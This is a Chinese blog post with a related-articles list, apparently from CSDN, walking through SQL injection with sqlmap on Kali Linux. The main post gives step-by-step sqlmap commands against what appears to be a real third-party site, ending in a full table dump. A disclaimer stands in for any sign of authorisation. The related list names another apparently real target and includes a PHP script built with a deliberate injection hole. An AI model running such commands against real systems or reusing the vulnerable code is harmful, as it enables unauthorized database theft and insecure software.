使用kali完成sql注入

最新推荐文章于 2025-11-19 18:23:53 发布
原创 最新推荐文章于 2025-11-19 18:23:53 发布 · 9.5k 阅读 · 80 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql

本文介绍了如何使用Kali Linux进行SQL注入攻击的详细步骤,包括前期准备、使用sqlmap工具检测注入、爆库、查看数据库和表信息以及提取字段内容。请注意,该内容仅供学术参考,不得用于非法活动。

使用kali完成sql注入

本文仅用于学术参考分享,如有侵权,请联系作者删除,请勿随意对网站进行sql注入

前期准备

1.kali虚拟机(自带sql注入所需工具)
2.能够进行注入的网站

实验步骤

1.查看是否可以sql注入
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ GET

在这里插入图片描述

2.爆库
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --dbs在这里插入图片描述

3.查看当前使用的是哪个库
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --current-db

在这里插入图片描述

4.查看当前users
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --users

在这里插入图片描述

5.列出当前数据库所有表
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ -D bnbcom_unidatabase --tables
在这里插入图片描述

6.列出上面查出来的任意一个表的所有列
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ -D bnbcom_unidatabase -T uni_room --columns
在这里插入图片描述

7.爆字段内容
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ -D bnbcom_unidatabase -T uni_room --dump

在这里插入图片描述

pray030
关注
KaLi Linux 利用漏洞注入--SQL
King_mzi的博客
11-23 956
根据 OWASP Top 10 2017 ( https://www.owasp.org/index.php/Top_10-2017_Top_10 )中的注入缺陷来说,如 SQL、操作系统命令和 XML 注入,是最普遍的漏洞,也是所有 web 应用程序的影响 最大漏洞。当来自用户提供的参数的不可信数据由服务器解释时,会出现注入缺陷。然后, 攻击者可以诱使解释器将这些数据视为可执行指令,使其执行非预期的命令或在没有 适当授权的情况下访问数据。
kali sql注入
zengliguang的专栏
04-27 1412
这是Kali Linux中最常用的自动化SQL注入工具之一,支持多种数据库类型,能进行深度扫描、数据提取、数据库管理操作、甚至获取系统权限。: 描述发现的SQL注入漏洞、影响范围、利用方法、获取的数据样本,以及修复建议(如使用参数化查询、输入验证、权限控制等)。: 确定要测试的Web应用或API的URL、请求方法(GET、POST等)、可能的输入参数等信息。: 记录测试过程中发现的注入点、使用的payload、获取的数据等详细信息,为编写报告做准备。等技巧,提取敏感数据如用户信息、密码哈希、系统配置等。
Kali Linux进行SQL注入与XSS漏洞利用教程(非常详细)网络安全零基础入门必看教程!
最新发布
wholeliubei的博客
11-19 524
本文介绍了在Kali Linux环境下进行网络安全实验的过程。实验环境包括Kali Linux 2022.4和Windows 10主机,通过IP配置确保网络连通。实验包括两部分:1)使用sqlmap工具进行SQL注入测试,包括获取服务器信息、数据库名称、表结构及数据内容;2)利用BeEF工具进行XSS漏洞利用,完成环境配置、工具安装及启动过程。实验展示了常见Web安全漏洞的检测与利用方法,为网络安全研究提供了实践参考。
kali下的SQL注入(DVWA sql注入 low等级)
weixin_43749051的博客
03-06 2307
(1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去,然后点击左侧的“DVWA Security”,选择“low”级别,点击选定。 (2)打开火狐浏览器,添加附件组件tamper data,安装后打开,然后登录dvwa,获取cookie值 (3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa
kali使用sqlmap进行sql注入
xv66666的博客
07-26 1184
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语句的执行时的注入
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 6839
安全等级调为low进入SQL Injection(Blind)页面。
kalisql注入
03-19 815
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的...
精选资源
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
Kali Linux SQL注入攻击教程
热门推荐
AsNeverBefore的博客
07-16 3万+
SQL注入是影响企业运营最具破坏力的漏洞之一,他会泄露保存在应用程序数据库中的敏感信息。本文利用虚拟机搭建测试环境,使用kali linux进行SQL注入实验
kali使用mysql注入攻击_kalisql注入
weixin_30588381的博客
01-18 1861
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的的操作系统...
kali Liunx 利用漏洞注入——SQL注入
Sword_of_despair的博客
11-19 1285
和其他示例一样,命令注入漏洞是由于输入验证机制不佳,以及使用用户提供的数据来形成字符串,这些字符串可能将用作操作系统的命令。20.下面维续猜解后面的字符,在结果中,你可能会发现%的结果总为 trme,这是因为%是通配符,它可以和任意一个字符匹配到。如果想要获得用户名和密码,就像在前面的小节中所做的那样,需要知道具有这些信息的表的名称。我们的载荷列表是a-&,1-9,和所有特殊符号的集合。应用程序会对上传的文件进行安全检查,当然,安全检查的手段是多种多样的,常见的是对后缀名的检查和。
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 2288
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
网络安全:Kali Linux 进行SQL注入与XSS漏洞利用
cronaldo91的博客
03-27 2648
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(5)Kali主机 ping Windows主机。(14)Windows主机弹出登录界面。(7)获取当前数据库指定的表的字段名。(4)Windows 查看IP地址。(6)获取当前数据库中所有表的名称。(8)获取指定库指定表指定字段的值。(1) LAMP(LNMP)平台。执行 (选择Execute)(15)beef获取账号及密码。(5)启动beef-xss。(9)beef获取目标主机。
渗透利器-kali工具 (第三章-5) sqlmap之sql注入一、二
ztc131450的博客
11-11 1265
1.脚本的租用:帮助我们绕过一些WAF,进行测试。2.脚本目录:Tamper目录。3.有哪些脚本:https://xz.aliyun.com/t/2746。
SQL注入攻防实验【实验环境:Kali Linux;Windows Server 2003】
qq_62199249的博客
11-05 1588
(3)通过Kali内置的SQL Map进行自动注入,首先打开Kali的终端,进入SQL Map模块,然后将DVWA进入到SQL Injection模块,将URL地址复制下来输入到终端,然后加入Cookie,在选择要查询的内容,首先查询所有数据库名,因此要在尾部加上--dbs,查询结果如下。(10)由此可得到用户的账户名称和加密过的口令,该口令通过观察可知为MD5加密,通过解密工具解密后就可得到相应口令,Low级的手工注入完成。(4) 查询某个数据库下的所有表名(dvwa),指令如下,如图查询到两个表名。
SQL注入-基础步骤(先判断好相关信息,然后使用Kalisqlmap进行注入
weixin_47696216的博客
11-24 2197
SQL注入基础
SQL注入方法
本散修的一些学习心得与笔记,道友请自便。
07-06 1191
记录一些注入思路和经常使用的工具,后续有用到新的工具和总结新的方法再继续补充。
Kali渗透测试之DVWA系列7——SQL Injection(SQL注入
浅浅的博客
06-13 4141
目录 一、SQL注入 1、SQL注入漏洞原理 2、SQL注入类型 3、SQL注入过程 二、实验环境 三、实验步骤 安全级别:LOW 安全等级:Medium 安全级别:High 安全级别:Impossible 一、SQL注入 1、SQL注入漏洞原理 把SQL命令插入到Web表单提交、或输入域名、或页面提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。 2、S...
Kali SQL注入--基于SQLi-Labs
black101的博客
07-20 2135
Kali SQL注入--基于SQLi-LabsSQLi-LabsSQL注入SQL注入的基本原理SQL注入初步实验一个结束语 SQLi-Labs SQLi-Labs是一个练习和理解SQL注入的非常合适的靶站平台,总共有75关,这里我选择它做我的实验环境来对结果进行展示。 SQL注入 SQL注入的基本原理 首先,这不是一篇极为完整的SQL注入整理,这只是一篇对原理的简单复习和介绍。 SQL注入的基本原理 这是正常的SQL语句 select * from user where id = '$id' limit
使用php,kali尝试SQL注入
10-14
### 使用PHP构建易受攻击的环境 先创建一个易受SQL注入攻击的PHP脚本,以下是一个简单示例: ```php <?php // 数据库连接信息 $servername = "localhost"; $username = "your_username"; $password = "your_password"; $dbname = "your_dbname"; // 创建连接 $conn = new mysqli($servername, $username, $password, $dbname); // 检查连接 if ($conn->connect_error) { die("连接失败: " . $conn->connect_error); } // 获取用户输入 $id = $_GET['id']; // 构造SQL查询 $sql = "SELECT * FROM users WHERE id = $id"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo "id: " . $row["id"]. " - Name: " . $row["name"]. "<br>"; } } else { echo "0 结果"; } $conn->close(); ?> ``` 这个脚本通过 `GET` 请求获取 `id` 参数,并直接将其拼接到SQL查询语句中,没有进行任何过滤和转义,存在SQL注入漏洞。 ### 使用Kali系统进行SQL注入测试 在Kali系统中,可以使用 `sqlmap` 工具进行SQL注入测试,以下是一些常见的用法: 1. **测试URL是否存在SQL注入漏洞**: ```bash sqlmap -u "http://example.com/script.php?id=1" ``` 如果需要携带 `cookie` 信息,可以使用 `--cookie` 参数,如: ```bash sqlmap -u "http://example.com/script.php?id=1" --cookie="security=low; PHPSESSID=n4tkop4ku1lbmsa4o6326vsv90" [^1] ``` 2. **获取数据库版本信息**: ```bash sqlmap -u "http://example.com/script.php?id=1" --banner ``` 3. **列出数据库中的所有数据库名**: ```bash sqlmap -u "http://example.com/script.php?id=1" --dbs ``` 4. **列出指定数据库中的所有表名**: ```bash sqlmap -u "http://example.com/script.php?id=1" -D your_database_name --tables ``` 5. **列出指定表中的所有字段名**: ```bash sqlmap -u "http://example.com/script.php?id=1" -D your_database_name -T your_table_name --columns ``` 6. **获取指定库指定表指定字段的值**: ```bash sqlmap -u http://example.com/script.php?id=46 -D your_database_name -T your_table_name -C column1,column2 --dump [^3] ``` ### 注意事项 进行SQL注入测试仅应在合法授权的安全测试环境中进行,在未经授权的情况下对他人的系统进行注入尝试是违法且不道德的行为。
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值